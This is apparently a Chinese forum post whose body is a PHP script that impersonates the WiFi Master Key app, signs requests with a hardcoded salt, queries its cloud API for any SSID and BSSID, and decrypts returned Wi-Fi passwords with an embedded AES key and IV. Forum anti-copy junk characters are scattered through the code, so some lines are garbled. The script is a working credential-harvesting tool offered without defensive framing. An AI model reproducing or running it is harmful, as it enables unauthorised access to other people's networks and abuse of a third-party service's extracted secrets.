上尉
- 注册时间
- 2010-7-6
- 金币
- 1189 个
- 威望
- 18 个
- 荣誉
- 0 个
尚未签到
|
<form action="" method="post">7 Z, i1 W8 ~( s( z, l
<p>ssid: <input type="text" name="ssid" /></p>
; k; u. m4 [, ~ <p>bssid: <input type="text" name="bssid" /></p>
( C2 V( O, |9 d" Z: J0 @. { <input type="submit" value="提交" />1 ]" P% [, }. {! Q! g% x
</form>
, w$ D5 Y- m/ Q1 k; t' c; e. K, B2 w
<?php
% M6 O7 {& T# i8 {# L1 `) s$bssid = $_POST["bssid"] ;
" x0 o$ g" w$ d( K$ssid = $_POST["ssid"] ;
* O8 F; R( G0 Q6 {if (isset( $bssid ) && isset( $ssid )){$ P* N* G& L) @) v
//update salt
' H4 o j$ b' G$ g, I" o0 r8 k $ret = request( $bssid , $ssid , md5(rand(1, 10000)));
/ N1 V1 O/ U4 B, U& a, B $ret = json_decode( $ret );4 r# I: y+ p. X+ s) K7 |
$ret = request( $bssid , $ssid , $ret ->retSn);$ {% @ E, v, A# x% ^. [2 q3 p
$ret = json_decode( $ret );
8 y% O+ s. Y, b9 h2 w7 t5 | if ( $ret ->retCd == 0){
- Z% |4 X, |- }1 g: b s if ( $ret ->qryapwd->retCd == 0){. W) z$ }8 p1 B( A5 q" u+ g9 t
$list = $ret ->qryapwd->psws;* e: Y4 d, {. ?2 t: U+ h1 M
foreach ( $list as $wifi ){3 m# M h) i8 M8 Z& _( Q
echo 'SSID: ' . $wifi ->ssid. "<br>" ;. ?" J, K: }/ Y8 e$ o
echo 'PWD: ' .decryptStrin( $wifi ->pwd). "<br>" ;! l1 M( G: {& k& H0 y0 j y
echo 'BSSID: ' . $wifi ->bssid. "<br>" ;, |# x5 N i4 }
if ( $wifi ->xUser){( b# p9 j& t1 ^( _
echo 'xUser: ' . $wifi ->xUser. "<br>" ;
6 }! \3 _$ Z7 h ^. l# E: [$ C echo 'xPwd: ' . $wifi ->xPwd. "<br>" ;
3 W5 _8 r/ Z. S }
{( A4 C a$ q& x @ }/ t6 K4 H5 r; ?- v* g
}
. r! f* l! h% |! z. \ else {
& Z1 H/ |) U; T5 T/ d echo $ret ->qryapwd->retMsg;1 Q; W8 ^. Z6 _# G1 X" G2 e! g( D
}
& _) y5 ?' [8 E& [; N }/ w) G( V! |" i5 }4 T3 e$ k/ h6 D
}6 x: t& `. |8 T J: E# E
function request( $bssid , $ssid , $salt , $dhid = 'ff8080814cc5798a014ccbbdfa375369' ){
* |' H- a, s! X2 w4 J3 ] $data = array ();9 E$ U- \! s, ?
$data [ 'appid' ] = '0008' ;
; w$ `7 |8 d: \8 z$ M& j5 B $data [ 'bssid' ] = $bssid ;* g2 [" _( |0 p, B3 w9 l, u* S: Q5 \
$data [ 'chanid' ] = 'gw' ; P% W' Y6 a/ N6 I9 ~: m5 Z# m E
$data [ 'dhid' ] = $dhid ;/ h1 ?5 J( ]' q# G( o) }
$data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac4' ;
& b1 x; W, O" E$ }7 W3 c" A $data [ 'lang' ] = 'cn' ;
8 r; M; h- g5 E, O; H $data [ 'mac' ] = '60f81dad28dh' ;
5 j4 T2 J& f- r+ M! L $data [ 'method' ] = 'getDeepSecChkSwitch' ;
& {$ x: i; U6 g/ J M& o0 z4 y! L $data [ 'pid' ] = 'qryapwd:commonswitch' ;
- f7 q% M4 s! ?! N7 R $data [ 'ssid' ] = $ssid ;. v+ C5 u9 a( p
$data [ 'st' ] = 'm' ;
( A4 Z- C1 L4 L! C# F/ C2 G" N1 l $data [ 'uhid' ] = 'a0000000000000000000000000000002' ;
3 ?% q3 ^0 k$ X$ t v0 u( h $data [ 'v' ] = '324' ;6 g0 b5 m$ T+ n! e2 P% A- L2 b, a
$data [ 'sign' ] = sign( $data , $salt );+ T! W( k7 g4 [! Z M
$curl = curl_init();0 y; K- u% [: y: I
curl_setopt( $curl , CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd' );+ | N/ u' ^+ u; _- \: X& I$ e! W; u
curl_setopt( $curl , CURLOPT_USERAGENT, 'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))' );
( g5 d' E) h, |- u5 \9 N5 G curl_setopt( $curl , CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate
: l. y+ v+ m% x7 Y, ` curl_setopt( $curl , CURLOPT_RETURNTRANSFER, true);" `! d" `0 u9 M. [7 F8 q2 ~0 ]* t- B
curl_setopt( $curl , CURLOPT_POST, true); // enable posting! K. P; N l1 t' R2 I% y
curl_setopt( $curl , CURLOPT_POSTFIELDS, http_build_query( $data )); // post images
: I" r' O' n r- `/ y6 L curl_setopt( $curl , CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload0 B) ~; c3 |: O, C
$r = curl_exec( $curl );+ V1 |' I6 W- `1 ]# K6 _
curl_close( $curl );
2 ]+ E' V# }4 b9 y! @1 v% ` return $r ;: B7 e) t7 \4 ~2 |3 u
}
& ?8 O# C* z7 Y3 n( Q2 wfunction registerNewDevice(){1 s M0 x2 f+ J5 W& o* b; w( J
$salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3vj#1Aa$' ;$ E( {' \( Y! `$ a! E
$data = array ();
& W* R: i1 C3 g2 }5 Y $data [ 'appid' ] = '0008' ;2 a. I p2 G5 s7 V0 @0 U! b5 F
$data [ 'bssid' ] = $bssid ;: m6 J4 Q& g, D: f5 Y- f3 M6 f, N3 F! P
$data [ 'chanid' ] = 'gw' ;& L' \7 \1 U4 \+ B1 o
$data [ 'dhid' ] = $dhid ;( r8 M) W4 ]. m) k7 q
$data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;/ U6 i6 ?6 w6 y# z
$data [ 'lang' ] = 'cn' ;' s, ^* K+ b% x
$data [ 'mac' ] = '60f81dad28de' ;: B F4 A0 m' T& m3 q4 n
$data [ 'method' ] = 'getDeepSecChkSwitch' ;. p% I- @& _5 t; [5 ?! r. O
$data [ 'pid' ] = 'qryapwd:commonswitch' ;2 z3 R" t; d/ ^, r$ G% y
$data [ 'ssid' ] = $ssid ;
6 z9 X1 y4 {) X) u" ]1 G $data [ 'st' ] = 'm' ;+ A1 x, k/ s3 P8 c4 E* {% J
$data [ 'uhid' ] = 'a0000000000000000000000000000001' ;" t8 c# G" Z: F. Y
$data [ 'v' ] = '324' ;
# K$ A! H2 J ~: U2 _: j' t $data [ 'sign' ] = sign( $data , $salt );
3 y& x8 A! y$ Q! z5 p+ W, E}
% A. w& H- m, I$ L/ Q+ f$ Ofunction sign( $array , $salt ){) C* S, O7 C% z
// 签名算法- U2 k2 q9 }8 B
$request_str = '' ;! [- U/ M% ^; b Q4 H5 Q# Q
// 对应apk中的 Arrays.sort 数组排序,测试PHP需用 ksort
( |! k+ @# d/ h0 u ksort( $array );
: D1 ~8 q, y/ `& \ foreach ( $array as $key => $value ) {& p& M) v$ J5 d
$request_str .= $value ;
1 i7 Y0 _+ k" v5 L }
, n3 D/ ]0 }5 J1 `9 ?2 Q+ `& ] $sign = md5( $request_str . $salt );. @5 K; U9 i# j4 G' ]4 a2 O
return strtoupper ( $sign );% P' U; C# z. c% v2 [
}
! u: R1 ~0 @4 [: T. p% ?( Zfunction decryptStrin( $str , $keys = 'k%7Ve#8Ie!5Fb&8E' , $iv = 'y!0Oe#2Wj#6Pw!3V' , $cipher_alg =MCRYPT_RIJNDAEL_128){! ]; i6 f% l8 j& C" T8 x
//Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密' D( z" ?& M" U* Q' c+ P. t
//[length][password][timestamp]# X: p5 @# t4 i0 o, q
$decrypted_string = mcrypt_decrypt( $cipher_alg , $keys , pack( "H*" , $str ),MCRYPT_MODE_CBC, $iv );
* @) [ K* v$ ~3 z9 U return substr (trim( $decrypted_string ),3,-13);& e& w& G$ \% k S' p
} ?> |
评分
-
1
查看全部评分
-
|
[复制链接]
IP卡
狗仔卡
发表于 2016-8-22 03:03
显身卡
